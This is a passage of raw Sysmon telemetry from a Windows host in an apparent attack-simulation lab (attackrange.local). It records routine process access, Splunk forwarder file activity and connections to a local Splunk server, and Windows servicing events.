12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.248{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B671F0FAD7693BF2580BAC5A3AB67F,SHA256=182B79BE4CF08A12313E40855D75A4DB3640CC3BC0CD3195CEDD0463AA0F20E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.494{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53631-false10.0.1.12-8000- 23542300x80000000000000009538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:47.294{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9420A77271A3C051C2C4534E6D46E830,SHA256=2F95CB259D763D260FCF7DB88D76B5B55981685E13F81621D2D3173768F31C6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:47.107{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=EA84BF2462941C98639E2D3DF2863CC8,SHA256=CB400DC10CF2CB0AB4CC1C8C34AA4F511395C7DDF6061ECD228DE4E6FEB5EDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:47.107{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C8FDD60ACDB7E2D51CA29C42DC8879D1,SHA256=1F735DC0113051C925BD912B3BADB575A8A8B1AE83193C2B7FCADDABD98E690B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:48.871{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=91847454475EBAE8BE505C28786DD157,SHA256=AB507145BEFA7FC33B8AFEE69791CE60B33D6C4A63E3E6E74A09D19A2BC1BF6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:48.309{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=141B43AE07A1B3645549E8F1F647DBAB,SHA256=AF4A09F570AB0D990C08821C268C9AB9D9B761CD3F219A9F6DB469324E865647,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:49.573{266CAFBE-655C-6064-4201-00000000AE01}6936NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\wbem\Performance\WmiApRpl.hMD5=B133A676D139032A27DE3D9619E70091,SHA256=AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:49.323{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84CF844F0930CD1B4D85444950A6A648,SHA256=1DCDFE9A5975D32699E03E3A99AF66C010D4BD0357FE19DE5CF0D4D56B19CD9D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:49.197{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53632-false10.0.1.12-8089- 23542300x80000000000000009544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:50.354{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82D0DB9F4A810AAFE192EDA0E45F781E,SHA256=7656655A5B982BB96BD3A8950886BDCC337971C2750FF1C3A1C637B3D72AD1AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:51.368{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F8894DA2DD437DB31AFE5FB5E95B272,SHA256=2A06E6157CB4D5C4F6DEF116715BD501143D96ABBAD0F46ACBF9FABD0DFEC9F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:52.586{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DEFF01B16D876F73469315D93BDA2555,SHA256=83A1DB6F393AE019756EF58D51568818E7069AAEF10A0183944D19349BE6E994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:52.586{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=EA84BF2462941C98639E2D3DF2863CC8,SHA256=CB400DC10CF2CB0AB4CC1C8C34AA4F511395C7DDF6061ECD228DE4E6FEB5EDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:52.383{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BA612E4BC1F93414A297591255E82D7,SHA256=A97D5CD26FA872F99C5C0F0DA75FDCCA864827908D194A4075051C443911AF6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:52.431{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53633-false10.0.1.12-8000- 23542300x80000000000000009555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.398{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CB8A503B209D1FBE656E91F3C1D1B35,SHA256=6E9EA91656C6C7F506B88FA8A9B7A4F6160AE0334C030852480327167A0B2A2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.085{266CAFBE-6472-6064-2400-00000000AE01}2972NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.blfMD5=49A85EE8931492D7D674E211E1504280,SHA256=382D898102BCC1DB932C173B6559507D0CAC2F51EECCFEA0A3E54F72F15FC292,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.085{266CAFBE-6472-6064-2400-00000000AE01}2972NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.2.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x80000000000000009552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.054{266CAFBE-6472-6064-2400-00000000AE01}2972NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.1.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x80000000000000009551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.023{266CAFBE-6472-6064-2400-00000000AE01}2972NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.0.regtrans-msMD5=8A7F31E4FA3C8E2617498494A091D4CB,SHA256=95ED45DDDFF38BFFDB857D7CB682DC9CD866602DB4FE8BEFE28972D5A594DFC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.007{266CAFBE-6472-6064-2300-00000000AE01}29322948C:\Windows\servicing\TrustedInstaller.exe{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+693a8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:54.412{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADFD16F728C4CE2FB049E0E7B32FE56A,SHA256=25B6745B1E7AA31566F1BFF37C1A3C8F4D3C8712F28751DB6FB29AEC9EE7196F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:54.397{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DEFF01B16D876F73469315D93BDA2555,SHA256=83A1DB6F393AE019756EF58D51568818E7069AAEF10A0183944D19349BE6E994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:55.443{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA1649A4C42CE06D781F2B993D807A7,SHA256=D2188D62234AFF0432F0CD43600F6462F9C0D996A37A9AA723ECBBC1DCC75B2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:56.567{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E40C19BEBFD3F196A51CBF6C370C4E8,SHA256=AC8B23B58230C48D736F00D04E4C31A78D6497C3D9D4AC10040CF04FFEF7650A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:57.660{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3DE25AEA1033360249622DF86155551,SHA256=B5C40478703E66166291B225A3D4F4FE981AD0964936071C359DAC35E141E0A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:58.674{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE549150D0B1B28A5C5C377F2EB05922,SHA256=338D17FFDABBC427A98907F87D130B6F119D31E8699A3853BBBA160E691DC56D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:59.751{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ACBF75B8CE274CECA8EBDC11073877B,SHA256=027DCD0CB4501AC971FC7CFED0A2340F82D435EB4DF61E6FB7A8C836F179A467,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:57.572{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53634-false10.0.1.12-8000- 23542300x80000000000000009565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:00.829{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE037C3FD104B8E35BAF7CE2375F2ABB,SHA256=12B70180C8A3B3016B055D45266011FC3B6519C2CEF34BF43759EBFCBA3A6728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:01.921{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 